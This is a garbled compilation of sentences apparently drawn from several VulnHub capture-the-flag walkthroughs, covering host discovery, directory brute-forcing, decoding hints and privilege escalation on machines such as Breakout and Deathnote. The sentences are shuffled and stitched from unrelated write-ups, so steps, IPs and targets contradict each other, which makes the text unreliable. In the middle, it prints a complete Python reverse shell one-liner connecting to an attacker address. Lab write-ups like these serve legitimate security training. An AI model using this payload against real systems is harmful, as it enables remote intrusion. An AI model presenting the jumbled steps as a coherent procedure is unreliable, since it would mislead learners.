We do not understand the hint message. Difficulty: Intermediate. Our goal is to capture the user and root flags. In the above screenshot, we can see that we used the echo command to append the host to the /etc/hosts file. As per the description, this is a beginner-friendly challenge, as the difficulty level is given as easy. We will use the FFUF tool for fuzzing the target machine. We need to figure out the type of encoding to view the actual SSH key. Quickly looking into the source code reveals a base64-encoded string. Anyway, we can see that /bin/bash gets executed under root, and now the user is escalated to root. Now we can read the file as user cyber; this is shown in the following screenshot. Using this username and the previously found password, I could log into the Webmin service running on port 20000. flag1. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. The identified directory could not be opened in the browser. It can be seen in the following screenshot. This is Breakout from Vulnhub. To my surprise, it did resolve, and we landed on a login page. VM LINK: https://download.vulnhub.com/empire/02-Breakout.zip, http://192.168.8.132/manual/en/index.html. So, let's start the walkthrough. Getting the IP address with the Netdiscover utility, Escalating privileges to get root access. At the bottom left, we can see an icon for Command shell. Description: A small VM made for a Dutch informal hacker meetup called Fristileaks. Vulnhub is a platform that provides vulnerable applications/machines to gain practical hands-on experience in the field of information security. Decoding it results in the following string. I am using Kali Linux as the attacker machine for solving this CTF. The notes.txt file seems to be some password wordlist.
The same was verified using the cat command, and the command's output shows that the mentioned host has been added. Foothold: fping -aqg 10.0.2.0/24, then nmap. I have also provided a downloadable URL for this CTF here, so you can download the machine and run it on VirtualBox. VulnHub Sunset Decoy Walkthrough - Conclusion. The IP address was visible on the welcome screen of the virtual machine. It tells Nmap to conduct the scan on all 65535 ports of the target machine. Prerequisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. This is the second in the Matrix-Breakout series, subtitled Morpheus:1. The Dirb command and scan results can be seen below. VM running on 192.168.2.4. We can do this by compressing the files and extracting them to read. Note: The target machine IP address may be different in your case, as the network DHCP is assigning it. Our target machine IP address that we will be working on throughout this challenge is 192.168.1.11 (the target machine IP address). It can be seen in the following screenshot. Let us get started with the challenge. In the screenshot given below, we can see that we have run Netdiscover, which gives us the list of all the available IP addresses. Command used: << dirb http://192.168.1.15/ >>. It will be visible on the login screen. ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.-.<++++++++++..>.++++.<<+.>-..++++++++++++++++++++.<.>>.<<++++++.++++++. We used the cat command for this purpose. Running it under admin reveals the wrong user type. Next, I checked for the open ports on the target. After running the downloaded virtual machine file in VirtualBox, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. This could be a username on the target machine or a password string.
In the Nmap results, five ports have been identified as open. When we checked the robots.txt file, another directory was mentioned, which can be seen in the above screenshot. The Usermin application admin dashboard can be seen in the below screenshot. The message states that an interesting file, notes.txt, is available on the target machine. We needed to copy-paste the encoded string as input, and the tool processed the string to decode the message. Please remember that VulnHub is a free community resource, so we are unable to check the machines that are provided to us. Host discovery. The next step is to scan the target machine using the Nmap tool. After some time, the tool identified the correct password for one user. We used the wget utility to download the file. The root flag was found in the root directory, as seen in the above screenshot. sudo netdiscover -r 10.0.0.0/24. The IP address of the target is 10.0.0.26. Identify the open services: let's check the open ports on the target. We got the password shown below. Trying directory brute force using gobuster. Let's use netdiscover to identify the same. python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.23",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'. Have a good day. Hello, my name is Elman. In the highlighted area of the above screenshot, we can see an IP address, our target machine IP address. So, we ran the WPScan tool on the target application to identify known vulnerabilities. BOOM! You play Trinity, trying to investigate a computer on . We found another hint in the robots.txt file. Let us try to decrypt the string by using an online decryption tool. In the /opt/ folder, we found a file named case-file.txt that mentions another folder with some useful information.
However, due to the complexity of the language and the use of only special characters, it can be used for encoding purposes. Learn more: https://www.technoscience.site/2022/05/empire-breakout-vulnhub-complete.html. Timestamps: 0:00 Introduction, 0:34 Setting Up, 1:31 Enumeration, 1:44 Discover and Identify Weaknesses, 3:56 Foothold, 4:18 Enum SMB, 5:21 Decode the Encrypted Cipher-text, 5:51 Login to the Dashboard, 6:21 The Command Shell, 7:06 Create a Reverse Bash Shell, 8:04 Privilege Escalation, 8:14 Local Privilege Escalation. So, two types of services are available to be enumerated on the target machine. Also, it's always better to spawn a reverse shell. We identified a few files and directories with the help of the scan. We will be using 192.168.1.23 as the attacker's IP address. First, we need to identify the IP of this machine. Just above this string there was also a message by eezeepz. So, we clicked on the hint and found the below message. Since we cannot traverse the admin directory, let's change the permissions using chmod in /home/admin, like echo /home/admin/chmod -R 777 /home/admin. Capturing the string and running it through an online cracker reveals the following output, which we will use. We have to identify a different way to upload the command execution shell. So let us open this directory in the browser as follows: As seen in the above screenshot, we found a hint that says the SSH private key is hidden somewhere in this directory.
Unlike my other CTFs, this time we do not need to use the Netdiscover command to get the target IP address. The web-based tool identified the encoding as a base58 cipher. The web-based tool also has a decoder for base58 ciphers, so we selected the decoder to convert the string into plain text. This worked in our case, and the message was successfully decrypted. This, however, confirms that the Apache service is running on the target machine. So, let us open the URL in the browser, which can be seen below. So as you've seen, this is a fairly simple machine with proper keys available at each stage. Nmap also showed that port 80 is open. I looked into the Robots directory but could not find any hints to the third key, so it's time to escalate to root. The comment can be seen below. Walkthrough. There are numerous tools available for web application enumeration. There is a default utility known as enum4linux in Kali Linux that can be helpful for this task. It is a default tool in Kali Linux designed for brute-forcing web applications. Enumerating HTTP Port 80 with the Dirb utility, Taking the Python reverse shell and user privilege escalation. If you haven't done it yet, I recommend you invest your time in it. Command used: << dirb http://deathnote.vuln/ >>. We used the Dirb tool for this purpose, which can be seen below. So I ran back to Nikto to see if it could reveal more information for me. So let's pass that to WPScan and see if we can get a hit. After a few attempts, the username Kira worked on the login page, and the password was also easily guessed from the hint messages we had read earlier. We will use the Nmap tool for it, as it works effectively and is available by default on Kali Linux. Let us start the CTF by exploring the HTTP port. Also, check my walkthrough of DarkHole from Vulnhub. However, upon opening the source of the page, we see a brainf#ck cipher.
Other than that, let me know if you have any ideas for what else I should stream! As we have access to the target machine, let us try to obtain reverse shell access by running a crafted Python payload. In CTF challenges, whenever I see a copy of a binary, I check its capabilities and SUID permission. We added another character, ., which is used for hidden files, in the scan command. Instead, if you want to search the whole filesystem for binaries having capabilities, you can do it recursively. So, in the next step, we will start solving the CTF with port 80. First, we need to identify the IP of this machine. So, we intercepted the request in Burp to check the error and found that the website was being redirected to a different hostname. Below we can see we have exploited the same, and now we are root. Command used: << ssh -i pass icex64@192.168.1.15 >>. However, it requires the passphrase to log in. Then, we used John the Ripper for cracking the password, but we were not able to crack the password of any user. Offensive Security recently acquired the platform, and it is a very good source for professionals trying to gain OSCP-level certifications. Today we will take a look at Vulnhub: Breakout. This is fairly easy to root and doesn't involve many techniques.